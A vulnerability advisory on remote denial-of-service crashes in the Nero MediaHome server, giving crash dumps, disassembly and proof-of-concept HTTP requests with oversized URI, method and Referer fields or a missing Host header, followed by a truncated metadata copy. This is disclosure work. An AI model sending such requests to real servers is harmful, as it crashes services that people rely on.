Description
Advisory ID: HTB23130
Product: Nero MediaHome
Vendor: Nero
Vulnerable Version(s): 4.5.8.0 and probably prior
Tested Version: 4.5.8.0 in Windows 7 SP1
Vendor Notification: November 21, 2012
Public Disclosure: January 9, 2013
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]
CVE References: CVE-2012-5876, CVE-2012-5877
CVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Low
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.
1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876
1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.
Crash details:
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 ( 62040072) -> (heap)
EBX: 003e0000 ( 4063232) -> b@>@>" (heap)
ECX: 00000000 ( 0) -> N/A
EDX: 00000000 ( 0) -> N/A
EDI: 03b2b000 ( 62042112) -> D (heap)
ESI: 03b2a800 ( 62040064) -> (heap)
EBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 ( 86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 ( 4063232) -> b@>@>" (heap)
+04: 00000022 ( 34) -> N/A
+08: 003e0004 ( 4063236) -> b@>@>" (heap)
+0c: 0526f88c ( 86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 ( 0) -> N/A
Disasm around:
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.
Crash details:
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b63008 ( 62271496) -> (heap)
EBX: 003e0000 ( 4063232) -> # 8@>+ (heap)
ECX: 00000000 ( 0) -> N/A
EDX: 00000000 ( 0) -> N/A
EDI: 03b64000 ( 62275584) -> B (heap)
ESI: 03b63000 ( 62271488) -> (heap)
EBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)
ESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)
+00: 003e0000 ( 4063232) -> # 8@>+ (heap)
+04: 00000021 ( 33) -> N/A
+08: 003e0004 ( 4063236) -> # 8@>+ (heap)
+0c: 0527f89c ( 86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 ( 0) -> N/A
Disasm around:
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
HEAD / [A * 265696] HTTP/1.1
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
Crash details:
EIP: 7c920a1b cmp ecx,[edx+0x4]
EAX: 03c1bb90 ( 63028112) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBX: 003e0000 ( 4063232) -> @>+ (heap)
ECX: 03c1bb90 ( 63028112) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EDX: 03b50101 ( 62193921) -> N/A
EDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H"G^^^^o^I@_l (heap)
ESI: 03c1bb88 ( 63028104) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBP: 033bfc78 ( 54262904) -> L;L (stack)
ESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)
+00: 003e0000 ( 4063232) -> @>+ (heap)
+04: 03c1bb78 ( 63028088) -> >>#H"G^^^^o^I@_lhf19fPf36dLa (heap)
+08: 00000000 ( 0) -> N/A
+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)
+10: 7c92084c (2089945164) -> N/A
+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)
Disasm around:
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
0x7c920a3c cmp eax,ecx
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
OPTIONS / [A * 265712]
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.host.com
1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server.
Crash details:
EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 ( 4063232) -> Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 ( 86505512) -> `' (stack)
ESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
+00: 003e0000 ( 4063232) -> Tp@>+ (heap)
+04: 00000021 ( 33) -> N/A
+08: 003e0004 ( 4063236) -> Tp@>+ (heap)
+0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)
Disasm around:
0x7c9209f8 jnz 0x7c95af5f
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]
2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877
2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.
Crash details:
EIP: 10003171 mov [eax+0x18],ebp
EAX: 00000000 ( 0) -> N/A
EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
ECX: 039cddea ( 60612074) -> localhost (heap)
EDX: 039cddea ( 60612074) -> localhost (heap)
EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)
ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
EBP: 00000009 ( 9) -> N/A
ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
+00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
+04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
+08: 00000000 ( 0) -> N/A
+0c: 00000001 ( 1) -> N/A
+10: 000000b8 ( 184) -> N/A
+14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)
Disasm around:
0x10003156 mov edx,[esi+0x8]
0x10003159 mov ebp,[esi+0xc]
0x1000315c push byte 0x1
0x1000315e push eax
0x1000315f push ecx
0x10003160 push ebx
0x10003161 mov [edi+0x40],esi
0x10003164 mov [esp+0x2c],edx
0x10003168 call 0x10002730
0x1000316d mov ecx,[esp+0x2c]
0x10003171 mov [eax+0x18],ebp
0x10003174 mov ebp,[esp+0x24]
0x10003178 add esp,0x10
0x1000317b mov [eax+0x14],ecx
0x1000317e mov edx,[ebp+0x8]
0x10003181 test edx,edx
0x10003183 mov [esp+0x14],edx
0x10003187 jnz 0x10002ff0
0x1000318d mov eax,[esp+0x24]
0x10003191 push eax
0x10003192 call 0x10002c20
Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:
GET / HTTP/1.1
: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com
-----------------------------------------------------------------------------------------------
Solution:
Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."
As a temporary solution it is advised to remove the vulnerable application from your system.
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.
[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Related
{"id": "SECURITYVULNS:DOC:28947", "bulletinFamily": "software", "title": "Nero MediaHome Multiple Remote DoS Vulnerabilities", "description": "\r\n\r\nAdvisory ID: HTB23130\r\nProduct: Nero MediaHome\r\nVendor: Nero\r\nVulnerable Version(s): 4.5.8.0 and probably prior\r\nTested Version: 4.5.8.0 in Windows 7 SP1\r\nVendor Notification: November 21, 2012 \r\nPublic Disclosure: January 9, 2013 \r\nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]\r\nCVE References: CVE-2012-5876, CVE-2012-5877\r\nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)\r\nRisk Level: Low \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.\r\n\r\n\r\n1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876\r\n\r\n1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b2a808 ( 62040072) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> b@>@>" (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b2b000 ( 62042112) -> D (heap)\r\nESI: 03b2a800 ( 62040064) -> (heap)\r\nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)\r\nESP: 0526f848 ( 86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)\r\n+00: 003e0000 ( 4063232) -> b@>@>" (heap)\r\n+04: 00000022 ( 34) -> N/A\r\n+08: 003e0004 ( 4063236) -> b@>@>" (heap)\r\n+0c: 0526f88c ( 86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n\t0x7c921664 mov ecx,[ebp+0x10]\r\n\t0x7c921667 add eax,[ecx]\r\n\t0x7c921669 cmp eax,0xfe00\r\n\t0x7c92166e ja 0x7c920721\r\n\t0x7c921674 cmp byte [ebp+0x14],0x0\r\n\t0x7c921678 jnz 0x7c95ae10\r\n\t0x7c92167e mov ecx,[esi+0xc]\r\n\t0x7c921681 lea eax,[esi+0x8]\r\n\t0x7c921684 mov edx,[eax]\r\n\t0x7c921686 mov [ebp+0x8],ecx\r\n\t0x7c921689 mov ecx,[ecx]\r\n\t0x7c92168b cmp ecx,[edx+0x4]\r\n\t0x7c92168e mov [ebp+0xc],edx\r\n\t0x7c921691 jnz 0x7c921734\r\n\t0x7c921697 cmp ecx,eax\r\n\t0x7c921699 jnz 0x7c921734\r\n\t0x7c92169f push esi\r\n\t0x7c9216a0 push ebx\r\n\t0x7c9216a1 call 0x7c920684\r\n\t0x7c9216a6 mov eax,[ebp+0xc]\r\n\t0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET /[A * 500000] HTTP/1.1\r\nHOST: somehost.com\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b63008 ( 62271496) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> # 8@>+ (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b64000 ( 62275584) -> B (heap)\r\nESI: 03b63000 ( 62271488) -> (heap)\r\nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)\r\nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)\r\n+00: 003e0000 ( 4063232) -> # 8@>+ (heap)\r\n+04: 00000021 ( 33) -> N/A\r\n+08: 003e0004 ( 4063236) -> # 8@>+ (heap)\r\n+0c: 0527f89c ( 86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n\t0x7c921664 mov ecx,[ebp+0x10]\r\n\t0x7c921667 add eax,[ecx]\r\n\t0x7c921669 cmp eax,0xfe00\r\n\t0x7c92166e ja 0x7c920721\r\n\t0x7c921674 cmp byte [ebp+0x14],0x0\r\n\t0x7c921678 jnz 0x7c95ae10\r\n\t0x7c92167e mov ecx,[esi+0xc]\r\n\t0x7c921681 lea eax,[esi+0x8]\r\n\t0x7c921684 mov edx,[eax]\r\n\t0x7c921686 mov [ebp+0x8],ecx\r\n\t0x7c921689 mov ecx,[ecx]\r\n\t0x7c92168b cmp ecx,[edx+0x4]\r\n\t0x7c92168e mov [ebp+0xc],edx\r\n\t0x7c921691 jnz 0x7c921734\r\n\t0x7c921697 cmp ecx,eax\r\n\t0x7c921699 jnz 0x7c921734\r\n\t0x7c92169f push esi\r\n\t0x7c9216a0 push ebx\r\n\t0x7c9216a1 call 0x7c920684\r\n\t0x7c9216a6 mov eax,[ebp+0xc]\r\n\t0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nHEAD / [A * 265696] HTTP/1.1\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c920a1b cmp ecx,[edx+0x4]\r\nEAX: 03c1bb90 ( 63028112) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEBX: 003e0000 ( 4063232) -> @>+ (heap)\r\nECX: 03c1bb90 ( 63028112) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEDX: 03b50101 ( 62193921) -> N/A\r\nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H"G^^^^o^I@_l (heap)\r\nESI: 03c1bb88 ( 63028104) -> >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEBP: 033bfc78 ( 54262904) -> L;L (stack)\r\nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)\r\n+00: 003e0000 ( 4063232) -> @>+ (heap)\r\n+04: 03c1bb78 ( 63028088) -> >>#H"G^^^^o^I@_lhf19fPf36dLa (heap)\r\n+08: 00000000 ( 0) -> N/A\r\n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)\r\n+10: 7c92084c (2089945164) -> N/A\r\n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n\t0x7c9209fe mov al,[esi+0x5]\r\n\t0x7c920a01 and al,0x10\r\n\t0x7c920a03 test al,0x10\r\n\t0x7c920a05 mov [edi+0x5],al\r\n\t0x7c920a08 jnz 0x7c920aa0\r\n\t0x7c920a0e mov ecx,[esi+0xc]\r\n\t0x7c920a11 lea eax,[esi+0x8]\r\n\t0x7c920a14 mov edx,[eax]\r\n\t0x7c920a16 mov [ebp+0xc],ecx\r\n\t0x7c920a19 mov ecx,[ecx]\r\n\t0x7c920a1b cmp ecx,[edx+0x4]\r\n\t0x7c920a1e mov [ebp+0x14],edx\r\n\t0x7c920a21 jnz 0x7c921752\r\n\t0x7c920a27 cmp ecx,eax\r\n\t0x7c920a29 jnz 0x7c921752\r\n\t0x7c920a2f push esi\r\n\t0x7c920a30 push ebx\r\n\t0x7c920a31 call 0x7c920684\r\n\t0x7c920a36 mov eax,[ebp+0x14]\r\n\t0x7c920a39 mov ecx,[ebp+0xc]\r\n\t0x7c920a3c cmp eax,ecx\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nOPTIONS / [A * 265712]\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nReferer: http://www.host.com\r\n\r\n\r\n\r\n1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \r\n\r\nCrash details:\r\n\r\nEIP: 7c920a19 mov ecx,[ecx]\r\nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBX: 003e0000 ( 4063232) -> Tp@>+ (heap)\r\nECX: 41414141 (1094795585) -> N/A\r\nEDX: 41414141 (1094795585) -> N/A\r\nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)\r\nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBP: 0527f828 ( 86505512) -> `' (stack)\r\nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)\r\n +00: 003e0000 ( 4063232) -> Tp@>+ (heap)\r\n +04: 00000021 ( 33) -> N/A\r\n +08: 003e0004 ( 4063236) -> Tp@>+ (heap)\r\n +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)\r\n +10: 7c928ccd (2089979085) -> N/A\r\n +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n\t0x7c9209f8 jnz 0x7c95af5f\r\n\t0x7c9209fe mov al,[esi+0x5]\r\n\t0x7c920a01 and al,0x10\r\n\t0x7c920a03 test al,0x10\r\n\t0x7c920a05 mov [edi+0x5],al\r\n\t0x7c920a08 jnz 0x7c920aa0\r\n\t0x7c920a0e mov ecx,[esi+0xc]\r\n\t0x7c920a11 lea eax,[esi+0x8]\r\n\t0x7c920a14 mov edx,[eax]\r\n\t0x7c920a16 mov [ebp+0xc],ecx\r\n\t0x7c920a19 mov ecx,[ecx]\r\n\t0x7c920a1b cmp ecx,[edx+0x4]\r\n\t0x7c920a1e mov [ebp+0x14],edx\r\n\t0x7c920a21 jnz 0x7c921752\r\n\t0x7c920a27 cmp ecx,eax\r\n\t0x7c920a29 jnz 0x7c921752\r\n\t0x7c920a2f push esi\r\n\t0x7c920a30 push ebx\r\n\t0x7c920a31 call 0x7c920684\r\n\t0x7c920a36 mov eax,[ebp+0x14]\r\n\t0x7c920a39 mov ecx,[ebp+0xc]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer:[A * 265566]\r\n\r\n\r\n\r\n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877\r\n\r\n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.\r\n\r\nCrash details:\r\n\r\nEIP: 10003171 mov [eax+0x18],ebp\r\n EAX: 00000000 ( 0) -> N/A\r\n EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n ECX: 039cddea ( 60612074) -> localhost (heap)\r\n EDX: 039cddea ( 60612074) -> localhost (heap)\r\n EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)\r\n ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)\r\n EBP: 00000009 ( 9) -> 